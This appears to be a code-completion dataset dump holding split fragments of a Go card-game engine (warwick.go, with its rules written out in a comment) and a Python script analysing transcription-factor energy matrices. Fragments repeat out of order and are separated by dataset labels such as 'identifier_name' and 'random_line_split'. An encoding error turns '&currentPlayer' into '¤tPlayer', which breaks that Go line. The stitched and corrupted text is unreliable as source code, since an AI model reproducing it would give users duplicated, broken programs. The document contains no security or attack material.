for (stock.PullPos > -1) && ((turnLimit == 0) || (turnCount < turnLimit)) && !gameOver {
turnCount++
phase := turnToPhase(turnCount)
// for safety
// if you can't build any of the cards in your hand (because those positions are filled), you can get stuck
if turnCount > 29 {
fmt.Println("The game went to 30 turns--ending as a safety")
gameOver = true
}
// turns
var opponent player.Player
for id, currentPlayer := range players {
if id == 0 {
opponent = players[1]
} else {
opponent = players[0]
}
// we keep track of messages to send to the Human player
if opponent.Human {
players[0].State = fmt.Sprintf("Turn: %d\n", turnCount + 2)
}
// if we're coming back to this player and they already have 9 cards, it's time to stop
if currentPlayer.Tableau.Fill == 9 {
gameOver = true
break;
// there is an error here in that if player 1 goes out first, player 0 doesn't get another play
}
// turn order:
// 1. Build
// 2. Attack
// 3. Trash (with Market)
// 4. Draw up to 5 OR discard down to 5
// determine card to build, cost
// determine discards
// do build
// log(2, fmt.Sprintf("Player %d hand: %s", id, currentPlayer.Hand))
// log(2, fmt.Sprintf("Player %d Tableau: %s", id, currentPlayer.Tableau))
builds := 0
// we check it each time, since if you build the card, you get to use it immediately
for builds < (currentPlayer.Tableau.BuildBonus + 1) {
buildPos, cost, upgrade := currentPlayer.PlayerChooses(legalBuildFrom, phase)
var discards []player.Pos
if buildPos.From != player.NoCard {
log(1, fmt.Sprintf("Player %d builds %s for %d", id, currentPlayer.CardByPos(buildPos), cost))
if cost > 0 {
discards = currentPlayer.ChooseDiscards(buildPos, cost, phase)
if logLevel > 1 {
fmt.Println("Player", id, "discards:")
for _, pos := range discards {
fmt.Println(currentPlayer.CardByPos(pos))
}
}
}
kind := currentPlayer.CardByPos(buildPos).Kind
cardValue := currentPlayer.CardByPos(buildPos).Cost
currentPlayer.Build(buildPos, discards, &discardPile, upgrade)
// if it's storage, you get a chance to place a card
if kind == card.Storage {
store(cardValue, &stock, &discardPile, ¤tPlayer, phase);
}
log(2, fmt.Sprintf("currentPlayer %d has %d cards left", id, currentPlayer.Hand.Count))
builds++
} else {
break;
}
}
// When they don't build, and they have cards, check if they'd like to trash and redraw
if builds == 0 {
preResetCount := currentPlayer.Hand.Count
if (currentPlayer.Human && preResetCount > 0 && currentPlayer.HumanWantsRedraw()) || (currentPlayer.Hand.Count == currentPlayer.Hand.Limit) {
// if the computer player can't build, but they have a full hand, they will get stuck. Invoke the hand reset rule
currentPlayer.Hand.Reset()
stock.RandomPull(preResetCount, players[id].Hand)
fmt.Println("Player", id, "dumps their hand and redraws")
// if you recycle your hand, you don't get to do any builds, attacks, exchanges
continue;
}
}
// ------ Attack --------- //
steal := currentPlayer.ChooseAttack(opponent, phase) // steal is a card kind
if steal != -1 {
// log(1, fmt.Sprintf("Player %d uses %s and takes opponent's %s", id, currentPlayer.TopCard(card.Soldiers), opponent.TopCard(steal)))
if opponent.Human{
players[0].State += fmt.Sprintf("ALERT: Opponent used a %s to take your %s\n", currentPlayer.TopCard(card.Soldiers), opponent.TopCard(steal))
}
opponent.Tableau.RemoveTop(steal, currentPlayer.Hand)
// then loose your attack card
currentPlayer.Tableau.RemoveTop(card.Soldiers, &trash) // TODO: remove to trash, test if it works
}
// ------- TRASH --------- //
cardsTrashed := 0
// TrashBonus measures the amount of cards you can trash in order to draw a new one
if currentPlayer.Tableau.TrashBonus > 0 && currentPlayer.Hand.Count > 0 {
trashPoses := currentPlayer.ChooseTrash(phase)
cardsTrashed = currentPlayer.TrashCards(trashPoses, &trash)
}
// you must trash card to get the draw bonus under the current rules
if (currentPlayer.Tableau.DrawBonus > 0) && (cardsTrashed > 0) {
stock.RandomPull(currentPlayer.Tableau.DrawBonus, players[id].Hand)
log(1, fmt.Sprintf("Player %d bonus draws %d", id, currentPlayer.Tableau.DrawBonus))
}
// ------- DRAW --------- //
// see how many open spots there are in the hand. This may not run at all
currentPlayer.Draw(&discardPile, &stock, phase)
// ------- DISCARD --------- //
// TODO: allow player to choose discard
for currentPlayer.Hand.Count > currentPlayer.Hand.Limit {
fmt.Println("=================== Player", id, "has", currentPlayer.Hand.Count, "cards =================");
trashPos, _ := currentPlayer.LowestValueCard(phase, nil)
currentPlayer.Hand.RemoveCard(trashPos.Index, &trash)
}
// if a human is playing record the state to share with them at the beginning of their turn
// this assumes the human always goes first
if opponent.Human {
players[0].State += fmt.Sprintf("Opponent Tableau:\n%s\n", currentPlayer.Tableau)
players[0].State += fmt.Sprintf("Your Tableau:\n%s\n", opponent.Tableau)
}
}
fmt.Println("----END OF TURN----")
}
// determine the winner
if logLevel > 0 {
vp := make([]int, 2)
for id, currentPlayer := range players {
fmt.Println("Player", id, "Tableau: ", currentPlayer.Tableau)
vp[id] = currentPlayer.VictoryPoints()
}
fmt.Println("Player 0", vp[0], "-", vp[1], "Player 1")
if vp[0] == vp[1] {
fmt.Println("Tie game")
} else if vp[0] < vp[1] {
fmt.Println("Player 1 wins!")
} else {
fmt.Println("Player 0 wins!")
}
}
} | store | identifier_name |
warwick.go | /*
You are building a medieval village. You win by having the most Victory Points (VP), which you get by building
particular buildings. You build by discarding cards. The game is over when one player has built one
of each kind of building (and his opponent gets one more turn), or when the deck runs out.
Buildings:
There are 9 different kinds of building: Civic, Defensive, School, Military, Manufacturing, Supply, Market, Farm and Storage.
Each gives you additional powers. Details are below. There are 2 of each building in the deck.
Soldiers:
You can also recruit a Soldier card, but only up to the level of your current Military building. Like a building, you must
discard as many cards as the level of the soldier, unless you have a farm, which reduces the cost of recruiting Soldiers.
Soldiers can be used to attack the opponent. By discarding a soldier, you may take a card of equal value from your opponent.
If they have a defensive building, you must take the defensive building, and you may only take it if it is of equal or
lesser value.
Additionally, soldiers may be used for defense. They subtract their value from the value of the attacking soldier. If they
have a greater value, both attacking and defending soldiers are discarded. This is optional, you may choose to save your
soldier for attack.
Like buildings, soldiers may be upgraded, but not above the level of the military building.
Storage:
There are 4 spots on the board which can be used for storage, but only if you build the Storage building. You may store as many
cards as the value of the storage building. Cards put into Storage may only be built, they may not be discarded or trashed.
When you build a storage building, the storage slots will be filled, but if you build one of those cards, you can use that
spot to put a card from your hand. If you upgrade your storage, you may be able to fill empty spots from the deck. If the
opponents soldier attacks you and takes your Storage building, he also gets everything you have in storage!
Storage reconsidered: | Storage reconsidered: Level 1 store one card, Level 2: + may build the stored card, Level 3: + may spend the stored card, Level 4: +1 storage spot
re2considered: 1: store card on table, 2: store 2nd card, 3: can move card back into hand, 4: fill any open storage spots at the time you build this card
re3considered: with each level, you open a spot that must be immediately filled from the draw, discard or hand
re4considered: 1: open a spot that may be immediately filled from the draw, discard or hand, 2: refill that spot, 3: add another, 4: refill both
Discard vs. Trash
There are two face up piles where cards go after they're used. When building, cards go into the discard. The Market buildings
allow you to draw from the discard pile (you must draw from the top of the pile. You may not look through the pile). When
using the Market buildings you may be able to trash cards to draw cards--cards that go into the trash may never be retrieved.
Soldiers go into the trash when they're used.
Turn order:
1. Build or Upgrade
2. Attack (optional, if Soldier recruited)
3. Store (optional, if Storage built)
4. Trash (optional, if Market built)
5. Hand limit is 5, draw up to 2, or discard
- or -
Trash all cards in hand, and draw the number trashed.
Building and Upgrading:
To build a level 3 building, you need to discard 3 cards. Buildings are built using wood, metal, or stone.
There are buildings that make other buildings made of certain materials cheaper to build. For instance, an Exchange (made of wood)
costs 3, but if you have a Carpentry, it will only cost you 2. If you have a Carpentry and a Sawmill, it will only cost you 1!
Buildings can also be upgraded. If you have a building of one level (say level 1), you can lay the building
of level 2 on top of it (but not the building of level 3 or 4!). That counts as a build, but doesn't cost you
anything.
To start:
Each player gets 5 cards.
*/
package main
import (
"fmt"
"math/rand"
"time"
"github.com/chrislunt/warwick/card"
"github.com/chrislunt/warwick/player"
)
var logLevel = 2
func log(level int, message string) {
if logLevel >= level {
fmt.Println(message);
}
}
func turnToPhase(turn int) (phase int) {
if turn > 6 {
phase = 2
} else if turn > 3 {
phase = 1
} else {
phase = 0
}
return
}
func store(storePower int, stock *card.Hand, discardPile *card.Hand, player *player.Player, phase int) {
var topSpot int
switch {
case storePower == 1 || storePower == 2:
// the player may choose from hand, discard or stock to fill the storage
// if the spot is open, you may refill it
topSpot = 0
case storePower == 3 || storePower == 4:
// a second storage spot opens, fill from stock, discard or hand
// for a 4, refill either open storage spots
topSpot = 1
}
for spot := 0; spot <= topSpot; spot++ {
if (*player).Tableau.Storage[spot] == nil {
storeCard := (*player).ChooseStore(stock, discardPile, phase)
log(1, fmt.Sprintf("Stored in storage %d: %s", spot, storeCard))
(*player).Tableau.Storage[spot] = storeCard
}
}
}
func buildStock() (stock card.Hand, stockSize int) {
rand.Seed( time.Now().UTC().UnixNano() )
// double the deck. This is the canonical reference of all cards.
var allCards = append(card.Deck[:], card.Deck[:]...)
stockSize = len(allCards)
// the stock, which can shrink, is a reference to all cards
stock.Cards = make([]*card.Card, stockSize)
stock.PullPos = stockSize - 1 // the position representing the current position to draw from
/* There are two ways we could randomize, one would be randomize the stock and keep a pointer of where we currently are,
which has an up-front randomization cost, but all subsequent pulls are cheap.
*/
// TODO make this a parameter
testStockId := -1
var permutation []int
if testStockId != -1 {
/* rather than having to specify the whole deck, I allow you to only specify the top of the deck */
fillSize := stockSize - len(card.TestStock[testStockId])
fillOut := rand.Perm(fillSize)
// for easier reading I specify the TestStock in reverse order, so get it ready to go on top
s := card.TestStock[testStockId]
for i, j := 0, len(s)-1; i < j; i, j = i+1, j-1 {
s[i], s[j] = s[j], s[i]
}
permutation = append(fillOut[0:fillSize], card.TestStock[testStockId]...);
} else {
permutation = rand.Perm(stockSize)
}
for i, v := range permutation {
stock.Cards[i] = &allCards[v]
}
return
}
func main() {
stock, stockSize := buildStock()
var discardPile card.Hand
discardPile.Cards = make([]*card.Card, stockSize)
discardPile.PullPos = -1
var trash card.Hand
trash.Cards = make([]*card.Card, stockSize)
// trash is never pulled from, so no pull position
players := make([]player.Player, 2);
// set up rules about where you can get cards from for different actions
legalBuildFrom := map[int] bool{
player.FromHand: true,
player.FromStorage: true,
player.FromStock: false,
player.FromDiscard: false,
}
// initialize the players
for id := range players {
players[id].Hand = &card.Hand{}
players[id].Hand.Limit = 5
players[id].Hand.Max = 7
// create the hand with an extra 2 slots beyond the limit, which could happen
// if you use a soldier and then do an exchange
players[id].Hand.Cards = make([]*card.Card, players[id].Hand.Max)
// do the initial draw of 5 cards
stock.RandomPull(5, players[id].Hand)
// initize the Tableaus. The Tableau is a map indexed by a card type constant
// the map points to a small hand which is the potential stack of cards as someone upgrades
// there are 10 types of cards, plus 2 storage spots so each slot must be initialized
players[id].Tableau = &card.Tableau{}
players[id].Tableau.Stack = make(map[int] *card.Hand)
players[id].Tableau.Discounts = make([]int, 4)
players[id].Tableau.BuildBonus = 0
players[id].Tableau.AttackBonus = 0
players[id].Tableau.Storage = make([] *card.Card, 2)
players[id].Human = false
players[id].State = "Turn 1:\n"
// the player strategy should be loaded from somewhere. For now, set it all to 32
// instead of 1 value per turn, do 3 columns for beginning, middle and end.
// Value can be set by cost to start with. Value may be adjusted by changes in cost.
// value could be affected at time of spend by what may be discarded as well.
players[id].Strategy = make([][][]int, 3)
for phase := 0; phase <= 2; phase++ {
players[id].Strategy[phase] = make([][]int, 10)
for kind := 0; kind <= 9; kind++ {
players[id].Strategy[phase][kind] = make([]int, 5)
for cost := 1; cost <= 4; cost++ {
players[id].Strategy[phase][kind][cost] = cost * 16 - 1
}
}
}
}
// TODO: this should be an input parameter
players[0].Human = true
turnLimit := 0 // you can use this to cut a game short for dev purposes
turnCount := 0
gameOver := false
// play until the deck runs out
// or until the first player fills everything in their table (soldier doesn't matter)
for (stock.PullPos > -1) && ((turnLimit == 0) || (turnCount < turnLimit)) && !gameOver {
turnCount++
phase := turnToPhase(turnCount)
// for safety
// if you can't build any of the cards in your hand (because those positions are filled), you can get stuck
if turnCount > 29 {
fmt.Println("The game went to 30 turns--ending as a safety")
gameOver = true
}
// turns
var opponent player.Player
for id, currentPlayer := range players {
if id == 0 {
opponent = players[1]
} else {
opponent = players[0]
}
// we keep track of messages to send to the Human player
if opponent.Human {
players[0].State = fmt.Sprintf("Turn: %d\n", turnCount + 2)
}
// if we're coming back to this player and they already have 9 cards, it's time to stop
if currentPlayer.Tableau.Fill == 9 {
gameOver = true
break;
// there is an error here in that if player 1 goes out first, player 0 doesn't get another play
}
// turn order:
// 1. Build
// 2. Attack
// 3. Trash (with Market)
// 4. Draw up to 5 OR discard down to 5
// determine card to build, cost
// determine discards
// do build
// log(2, fmt.Sprintf("Player %d hand: %s", id, currentPlayer.Hand))
// log(2, fmt.Sprintf("Player %d Tableau: %s", id, currentPlayer.Tableau))
builds := 0
// we check it each time, since if you build the card, you get to use it immediately
for builds < (currentPlayer.Tableau.BuildBonus + 1) {
buildPos, cost, upgrade := currentPlayer.PlayerChooses(legalBuildFrom, phase)
var discards []player.Pos
if buildPos.From != player.NoCard {
log(1, fmt.Sprintf("Player %d builds %s for %d", id, currentPlayer.CardByPos(buildPos), cost))
if cost > 0 {
discards = currentPlayer.ChooseDiscards(buildPos, cost, phase)
if logLevel > 1 {
fmt.Println("Player", id, "discards:")
for _, pos := range discards {
fmt.Println(currentPlayer.CardByPos(pos))
}
}
}
kind := currentPlayer.CardByPos(buildPos).Kind
cardValue := currentPlayer.CardByPos(buildPos).Cost
currentPlayer.Build(buildPos, discards, &discardPile, upgrade)
// if it's storage, you get a chance to place a card
if kind == card.Storage {
store(cardValue, &stock, &discardPile, ¤tPlayer, phase);
}
log(2, fmt.Sprintf("currentPlayer %d has %d cards left", id, currentPlayer.Hand.Count))
builds++
} else {
break;
}
}
// When they don't build, and they have cards, check if they'd like to trash and redraw
if builds == 0 {
preResetCount := currentPlayer.Hand.Count
if (currentPlayer.Human && preResetCount > 0 && currentPlayer.HumanWantsRedraw()) || (currentPlayer.Hand.Count == currentPlayer.Hand.Limit) {
// if the computer player can't build, but they have a full hand, they will get stuck. Invoke the hand reset rule
currentPlayer.Hand.Reset()
stock.RandomPull(preResetCount, players[id].Hand)
fmt.Println("Player", id, "dumps their hand and redraws")
// if you recycle your hand, you don't get to do any builds, attacks, exchanges
continue;
}
}
// ------ Attack --------- //
steal := currentPlayer.ChooseAttack(opponent, phase) // steal is a card kind
if steal != -1 {
// log(1, fmt.Sprintf("Player %d uses %s and takes opponent's %s", id, currentPlayer.TopCard(card.Soldiers), opponent.TopCard(steal)))
if opponent.Human{
players[0].State += fmt.Sprintf("ALERT: Opponent used a %s to take your %s\n", currentPlayer.TopCard(card.Soldiers), opponent.TopCard(steal))
}
opponent.Tableau.RemoveTop(steal, currentPlayer.Hand)
// then loose your attack card
currentPlayer.Tableau.RemoveTop(card.Soldiers, &trash) // TODO: remove to trash, test if it works
}
// ------- TRASH --------- //
cardsTrashed := 0
// TrashBonus measures the amount of cards you can trash in order to draw a new one
if currentPlayer.Tableau.TrashBonus > 0 && currentPlayer.Hand.Count > 0 {
trashPoses := currentPlayer.ChooseTrash(phase)
cardsTrashed = currentPlayer.TrashCards(trashPoses, &trash)
}
// you must trash card to get the draw bonus under the current rules
if (currentPlayer.Tableau.DrawBonus > 0) && (cardsTrashed > 0) {
stock.RandomPull(currentPlayer.Tableau.DrawBonus, players[id].Hand)
log(1, fmt.Sprintf("Player %d bonus draws %d", id, currentPlayer.Tableau.DrawBonus))
}
// ------- DRAW --------- //
// see how many open spots there are in the hand. This may not run at all
currentPlayer.Draw(&discardPile, &stock, phase)
// ------- DISCARD --------- //
// TODO: allow player to choose discard
for currentPlayer.Hand.Count > currentPlayer.Hand.Limit {
fmt.Println("=================== Player", id, "has", currentPlayer.Hand.Count, "cards =================");
trashPos, _ := currentPlayer.LowestValueCard(phase, nil)
currentPlayer.Hand.RemoveCard(trashPos.Index, &trash)
}
// if a human is playing record the state to share with them at the beginning of their turn
// this assumes the human always goes first
if opponent.Human {
players[0].State += fmt.Sprintf("Opponent Tableau:\n%s\n", currentPlayer.Tableau)
players[0].State += fmt.Sprintf("Your Tableau:\n%s\n", opponent.Tableau)
}
}
fmt.Println("----END OF TURN----")
}
// determine the winner
if logLevel > 0 {
vp := make([]int, 2)
for id, currentPlayer := range players {
fmt.Println("Player", id, "Tableau: ", currentPlayer.Tableau)
vp[id] = currentPlayer.VictoryPoints()
}
fmt.Println("Player 0", vp[0], "-", vp[1], "Player 1")
if vp[0] == vp[1] {
fmt.Println("Tie game")
} else if vp[0] < vp[1] {
fmt.Println("Player 1 wins!")
} else {
fmt.Println("Player 0 wins!")
}
}
} | Level 1 store one card, Level 2: + may build the stored card, Level 3: + may spend the stored card, Level 4: +1 storage spot | random_line_split |
energy_matrix_analysis.py | """
We wish to explore the relationship between copy number and various
energy matrix statistics, such as disorder (i.e. standard deviation of
score).
"""
from utils import *
from parse_energy_matrices import parse_energy_matrices
from scipy.stats import wilcoxon
#energy_matrices = parse_energy_matrices("energy_matrices.txt")
beta = 1.61
n = 16
G = 100000.0
alpha = 0.5
L = 10
ns_binding_const = -8
base_dict = {b:i for i,b in enumerate("ACGT")}
def score_ref(matrix,seq,ns=True):
"""Score a sequence with a motif. This is a reference
implementation. See score for production implementation"""
specific_binding = sum([row[base_dict[b]] for row,b in zip(matrix,seq)])
if ns:
return log(exp(-beta*specific_binding) + exp(-beta*ns_binding_const))/-beta
else:
return specific_binding
def score(matrix,seq,ns=True):
"""Score a sequence with a motif."""
#specific_binding = sum([row[base_dict[b]] for row,b in zip(matrix,seq)])
specific_binding = 0
for i in xrange(len(matrix)):
specific_binding += matrix[i][base_dict[seq[i]]]
if ns:
return log(exp(-beta*specific_binding) + exp(-beta*ns_binding_const))/-beta
else:
return specific_binding
def matrix_mean(matrix):
"""Return the mean score for the energy matrix"""
return sum(map(mean,matrix))
def matrix_variance(matrix):
"""Return the variance of the scores for the energy matrix"""
return sum(map(lambda row:variance(row,correct=False),matrix))
def matrix_sd(matrix):
return sqrt(matrix_variance(matrix))
def specific_binding_fraction(matrix,n=10000):
"""What fraction of the time does the tf bind specifically (i.e. < -8kbt)
to a random site?"""
return mean([score(matrix,random_site(10)) < -8 for i in xrange(n)])
def predict_mean_prop(matrix,ns=True):
"""estimate <exp(-beta*score(matrix,site))>
ns: non-specific binding"""
return (product([mean([exp(-beta*ep) for ep in col]) for col in matrix]) +
(exp(-beta*(-8)) if ns else 0)) # kbT
def predict_variance_prop(matrix):
"""estimate Var(exp(-beta*score(matrix,site)))"""
# See: The Variance of the Product of K Random Variables
# Leo A. Goodman | # product(e_of_sqs) - product(esqs), not sum...
# expectation of square
e_of_sqs = [mean([exp(-beta*ep)**2 for ep in col]) for col in matrix]
# square of expectation
esqs = [mean([exp(-beta*ep) for ep in col])**2 for col in matrix]
return product(e_of_sqs) - product(esqs)
def predict_z(matrix,num_sites,ns=True):
return predict_mean_prop(matrix,ns=ns) * num_sites
def predict_z_variance(matrix,num_sites):
return predict_variance_prop(matrix) * num_sites
def mean_variance_plot(filename=None):
means = map(matrix_mean,energy_matrices)
variances = map(matrix_variance,energy_matrices)
plt.scatter(ks,means,label="Mean")
plt.scatter(ks,variances,label="Variance",color='g')
mean_regression = lambda x:poly1d(polyfit(map(log,ks),means,1))(log(x))
variance_regression = lambda x:poly1d(polyfit(map(log,ks),variances,1))(log(x))
plt.plot(*pl(mean_regression,map(iota,range(1,65))))
plt.plot(*pl(variance_regression,map(iota,range(1,65))))
plt.semilogx()
plt.xlabel("Copy Number")
plt.ylabel("kBT,(kBT)^2")
plt.legend(loc=0)
if filename:
plt.savefig(filename,dpi=400)
else:
plt.show()
def specific_binding_fraction_plot(filename=None):
binding_fractions = map(specific_binding_fraction,verbose_gen(energy_matrices))
plt.scatter(ks,binding_fractions)
plt.xlabel("Copy Number")
plt.ylabel("Specific binding fraction")
plt.loglog()
if filename:
plt.savefig(filename,dpi=400)
else:
plt.show()
def max_16_ic(matrix,n=100000):
"""
Compute motif_ic of top 16 of n random sites
"""
width = len(matrix)
sites = [random_site(width) for i in xrange(n)]
scores = map(lambda site:score(matrix,site),sites)
top16 = map(first,sorted(zip(sites,scores),key=lambda(site,score):score)[:16])
return motif_ic(top16)
def matrix_as_psfm(matrix):
"""
convert energy to psfm, assuming uniform probabilities
DEPRECATED: INCOMPLETE
"""
return [[2**(ep-2) for ep in row] for row in matrix]
def predict_site_energy(matrix,n,G,alpha):
"""See blue notebook: 6/27/13"""
#constant which does not depend on sites, matrix
C = 1/beta * log(n/G*(1-alpha)/alpha)
Zb = predict_z(matrix,G)
omega = Zb/G
return C - (1/beta * log(omega))
def predict_zf(matrix,n,G,alpha):
"""Predict sum_{i=1}^n exp(-\beta*E(s))"""
ep_f = predict_site_energy(matrix,n,G,alpha)
return n*exp(-beta*ep_f)
C = 1/beta * (log(n/G*(1-alpha)/alpha) + L * log(4))
def site_error(matrix,site):
"""Compute error for site, given matrix"""
return (score(matrix,site,ns=False)
- C
+ 1/beta * sum([log(sum([exp(-beta*matrix[i][base_dict[b]])
for b in "ACGT"]))
for i in range(L)]))
def site_error_optimized(matrix,site):
"""Compute error for site, given matrix"""
return score(matrix,site,ns=False) - C
def sse(matrix,motif):
"""Compute sum of squared error for matrix and motif"""
return sum([site_error(matrix,site)**2
for site in motif])
def sse_optimized(matrix,motif):
"""Compute sum of squared error for matrix and motif"""
#Hoisted computation of K out of site_error
K = 1/beta * sum([log(sum([exp(-beta*matrix[i][base_dict[b]])
for b in "ACGT"]))
for i in range(L)])
return sum([(site_error_optimized(matrix,site)+K)**2
for site in motif])
def sse_experiment(motif):
"""Given a collection of sites, can we find a corresponding energy
matrix by gradient descent on sum of squared errors?"""
L = len(matrix)
n = len(motif)
G = 100000.0
alpha = 0.9
def partial_site_error(matrix,site,i,b):
return 2*site_error(matrix,site)*(int(site[i] == b)
- (exp(-beta*matrix[i][base_dict[b]])
/sum([exp(-beta*matrix[i][base_dict[c]])
for c in "ACGT"])))
def partial_sse(matrix,i,b):
return sum([2*site_error(matrix,site)*partial_site_error(matrix,site,i,b)
for site in motif])
def jacobian(matrix):
return [[partial_sse(matrix,i,b) for b in "ACGT"] for i in range(L)]
def grad_desc(matrix,max_its=1000):
step = 0.0001
tolerance = 0.001
current_sse = sse(matrix)
print current_sse
its = 0 # iterations
sses = []
while current_sse > tolerance and its < max_its:
j = jacobian(matrix)
#print j
matrix = matrix_add(matrix,matrix_scalar_mult(-step,j))
current_sse = sse(matrix)
print its,current_sse #,[score(matrix,site,ns=False) for site in motif]
#print matrix
its += 1
sses.append(current_sse)
return matrix,sses
print matrix,motif
return grad_desc([[0]*4 for i in range(L)])
def mutate_matrix(matrix):
"""Mutate the matrix by perturbing one weight by a standard normal"""
L = len(matrix)
r_i = random.randrange(L)
r_j = random.randrange(4)
r = random.gauss(0,1)
return [[matrix[i][j]+r*(i==r_i)*(j==r_j)
for j in range(4)] for i in range(L)]
def propose(matrix,motif):
"""Return a candidate (S,R) system by mutating either the motif or
the matrix"""
if random.random() < 0.5:
return matrix,mutate_motif(motif)
else:
return mutate_matrix(matrix),motif
def mh_experiment(text="",filename=None):
"""Metropolis-Hastings sampling for SSE of (S,R) systems"""
motif = [random_site(L) for i in range(n)]
matrix = [[0,0,0,0] for i in range(L)]
xs = mh(lambda(matrix,motif):exp(-sse_optimized(matrix,motif)),
lambda(matrix,motif):propose(matrix,motif),
(matrix,motif),
verbose=True,
iterations=50000)
sses = [sse_optimized(matrix,motif)
for (matrix,motif) in verbose_gen(xs,modulus=1000)]
ics = [motif_ic(motif) for (matrix,motif) in verbose_gen(xs,modulus=1000)]
ginis = [motif_gini(motif) for (matrix,motif) in verbose_gen(xs,modulus=1000)]
plt.scatter(ics,sses)
plt.xlabel("Motif Information Content (bits)")
plt.ylabel("Sum Squared Error")
plt.title("Motif IC vs. Sum Squared error: %s " % text)
maybesave(filename)
def ic_vs_gini_scatterplot_exp(trials=100,stopping_crit=1,filename=None):
# redo this properly!
matrix = [[0,0,0,0] for i in range(L)]
motif = [random_site(L) for i in range(n)]
# xs = mh(lambda(matrix,motif):exp(-sse_optimized(matrix,motif)),
# lambda(matrix,motif):propose(matrix,motif),
# (matrix,motif),
# verbose=True,
# iterations=50000,every=100)
scale = 0.01 #use this to prevent overflows in anneal
scaled_sse = lambda(matrix,motif):sse_optimized(matrix,motif)*scale
annealed_system = lambda: anneal(scaled_sse,
lambda(matrix,motif):propose(matrix,motif),
(matrix,motif),
iterations=100000,
stopping_crit = stopping_crit*scale)
xs = [annealed_system() for i in verbose_gen(xrange(trials))]
ginis = [motif_gini(motif)
for (matrix,motif) in verbose_gen(xs,modulus=1000)]
ics = [motif_ic(motif) for (matrix,motif) in verbose_gen(xs,
modulus=1000)]
sa_motifs = [sa_motif_with_desired_ic(ic,0.1,16,10)
for ic in verbose_gen(ics)]
greedy_motifs = [generate_greedy_motif_with_ic(ic,0.1,16,10)
for ic in verbose_gen(ics)]
sa_ics = [motif_ic(motif) for motif in sa_motifs]
sa_ginis = [motif_gini(motif) for motif in sa_motifs]
greedy_ics = [motif_ic(motif) for motif in greedy_motifs]
greedy_ginis = [motif_gini(motif) for motif in greedy_motifs]
plt.scatter(ics,ginis,color='b',label="Systems")
plt.scatter(sa_ics,sa_ginis,color='r',label="MCMC")
plt.scatter(greedy_ics,greedy_ginis,color='g',label="Greedy")
print "Systems vs. SA motifs:",wilcoxon(ginis,sa_ginis)
print "Systems vs. greedy motifs:",wilcoxon(ginis,greedy_ginis)
print "Greedy vs. sa motifs:",wilcoxon(sa_ginis,greedy_ginis)
# Systems vs. SA motifs: (75677.0, 2.1175931461637028e-81)
# Systems vs. greedy motifs: (78734.0, 1.2196302463732947e-78)
# Greedy vs. sa motifs: (247043.0, 0.72555385752004398)
maybesave(filename)
print "loaded energy_matrix_analysis"
def mr_pairs_have_less_mi_exp(filename=None):
"""Motifs evolved as M-R pairs have less MI than random motifs
with the same IC"""
trials = 500
matrix = [[0,0,0,0] for i in range(L)]
motif = [random_site(L) for i in range(n)]
scale = 0.01 #use this to prevent overflows in anneal
scaled_sse = lambda(matrix,motif):sse_optimized(matrix,motif)*scale
annealed_system = lambda :anneal(scaled_sse,
lambda(matrix,motif):propose(matrix,motif),
(matrix,motif),
verbose=True,
iterations=100000,
stopping_crit = 0.1*scale)
systems = [annealed_system() for i in xrange(500)]
motifs = map(second,systems)
ics = map(motif_ic,motifs)
control_motifs = [sa_motif_with_desired_ic(ic,0.1,n,L) for ic in verbose_gen(ics)]
mis = map(total_motif_mi,motifs)
control_mis = map(total_motif_mi,control_motifs)
plt.scatter(mis,control_mis)
plt.xlabel("M-R System Mutual Information (bits)")
plt.ylabel("Annealed Motif Mutual Information (bits)")
plt.plot([0,5],[0,5])
maybesave(filename)
#mannwhitneyu(mis,control_mis) -> (47673.0, 1.2864021557444156e-64)
return mis,control_mis | # Page 55 of 54-60
# However, first line of equation 1 is /wrong/. Should be: | random_line_split |
energy_matrix_analysis.py | """
We wish to explore the relationship between copy number and various
energy matrix statistics, such as disorder (i.e. standard deviation of
score).
"""
from utils import *
from parse_energy_matrices import parse_energy_matrices
from scipy.stats import wilcoxon
#energy_matrices = parse_energy_matrices("energy_matrices.txt")
beta = 1.61
n = 16
G = 100000.0
alpha = 0.5
L = 10
ns_binding_const = -8
base_dict = {b:i for i,b in enumerate("ACGT")}
def score_ref(matrix,seq,ns=True):
"""Score a sequence with a motif. This is a reference
implementation. See score for production implementation"""
specific_binding = sum([row[base_dict[b]] for row,b in zip(matrix,seq)])
if ns:
return log(exp(-beta*specific_binding) + exp(-beta*ns_binding_const))/-beta
else:
return specific_binding
def score(matrix,seq,ns=True):
"""Score a sequence with a motif."""
#specific_binding = sum([row[base_dict[b]] for row,b in zip(matrix,seq)])
specific_binding = 0
for i in xrange(len(matrix)):
specific_binding += matrix[i][base_dict[seq[i]]]
if ns:
return log(exp(-beta*specific_binding) + exp(-beta*ns_binding_const))/-beta
else:
return specific_binding
def matrix_mean(matrix):
"""Return the mean score for the energy matrix"""
return sum(map(mean,matrix))
def matrix_variance(matrix):
"""Return the variance of the scores for the energy matrix"""
return sum(map(lambda row:variance(row,correct=False),matrix))
def matrix_sd(matrix):
return sqrt(matrix_variance(matrix))
def specific_binding_fraction(matrix,n=10000):
"""What fraction of the time does the tf bind specifically (i.e. < -8kbt)
to a random site?"""
return mean([score(matrix,random_site(10)) < -8 for i in xrange(n)])
def predict_mean_prop(matrix,ns=True):
"""estimate <exp(-beta*score(matrix,site))>
ns: non-specific binding"""
return (product([mean([exp(-beta*ep) for ep in col]) for col in matrix]) +
(exp(-beta*(-8)) if ns else 0)) # kbT
def predict_variance_prop(matrix):
"""estimate Var(exp(-beta*score(matrix,site)))"""
# See: The Variance of the Product of K Random Variables
# Leo A. Goodman
# Page 55 of 54-60
# However, first line of equation 1 is /wrong/. Should be:
# product(e_of_sqs) - product(esqs), not sum...
# expectation of square
e_of_sqs = [mean([exp(-beta*ep)**2 for ep in col]) for col in matrix]
# square of expectation
esqs = [mean([exp(-beta*ep) for ep in col])**2 for col in matrix]
return product(e_of_sqs) - product(esqs)
def predict_z(matrix,num_sites,ns=True):
return predict_mean_prop(matrix,ns=ns) * num_sites
def predict_z_variance(matrix,num_sites):
return predict_variance_prop(matrix) * num_sites
def mean_variance_plot(filename=None):
means = map(matrix_mean,energy_matrices)
variances = map(matrix_variance,energy_matrices)
plt.scatter(ks,means,label="Mean")
plt.scatter(ks,variances,label="Variance",color='g')
mean_regression = lambda x:poly1d(polyfit(map(log,ks),means,1))(log(x))
variance_regression = lambda x:poly1d(polyfit(map(log,ks),variances,1))(log(x))
plt.plot(*pl(mean_regression,map(iota,range(1,65))))
plt.plot(*pl(variance_regression,map(iota,range(1,65))))
plt.semilogx()
plt.xlabel("Copy Number")
plt.ylabel("kBT,(kBT)^2")
plt.legend(loc=0)
if filename:
plt.savefig(filename,dpi=400)
else:
plt.show()
